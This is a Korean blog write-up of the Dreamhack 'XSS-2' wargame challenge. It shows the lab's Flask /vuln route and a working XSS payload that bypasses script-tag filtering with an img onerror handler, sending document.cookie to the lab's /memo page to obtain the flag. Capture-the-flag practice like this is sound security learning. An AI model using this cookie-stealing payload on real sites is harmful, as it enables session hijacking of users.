[Dreamhack] XSS-2

Webhacking-Write-Up/Dreamhack

[Dreamhack] XSS-2

SlowTurtle_ 2023. 1. 9. 18:49

728x90

[Dreamhack] Wargame - XSS-2

/vuln

xss-2에서는 alert이 작동하지 않는 것을 확인했다. 그래서 코드를 확인해봤다. /vuln부분만 달라진 것을 확인했다.

@app.route("/vuln")
def vuln():
    return render_template("vuln.html")

render_template("vuln.html")로 막혀있었다. 그래서 우회하는 방법을 알아봤다.

img태그는 성공적으로 되는 것을 확인할 수 있었고 script태그를 사용하지 않아도 onerror속성을 활용해서 script를 작성할 수 있는 코드를 알 수 있었다.

<img src="xss" onerror="location.href='/memo?memo='+document.cookie">

이 코드를 /flag에 작성하고 memo로 가보니

flag를 획득할 수 있었다.

728x90

'Webhacking-Write-Up > Dreamhack' 카테고리의 다른 글

[Dreamhack] simple_sqli (0)	2023.01.09
[Dreamhack] csrf-1 (0)	2023.01.09
[Dreamhack] XSS-1 (0)	2023.01.09
[Dreamhack] Same Origin Policy (SOP) (0)	2022.12.20
[Dreamhack] session-basic (0)	2022.12.20

현재글[Dreamhack] XSS-2

IT/보안

los, 빡공팟5기, TeamH4C, AWS, OWASP, CSRF, P4C, 파이썬, OWASP WebGoat, dreamhack, EC2, SQL Injection, DVWA, webhacking, webgoat, XSS, 빡공팟, wargame, webhacking.kr, 드림핵,

Today :
Yesterday :

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

SlowTurtle

[Dreamhack] XSS-2

[Dreamhack] Wargame - XSS-2

'Webhacking-Write-Up > Dreamhack' 카테고리의 다른 글

'Webhacking-Write-Up/Dreamhack'의 다른글

티스토리툴바

[Dreamhack] XSS-2

[Dreamhack] Wargame - XSS-2

'Webhacking-Write-Up > Dreamhack' 카테고리의 다른 글

'Webhacking-Write-Up/Dreamhack'의 다른글

관련글

티스토리툴바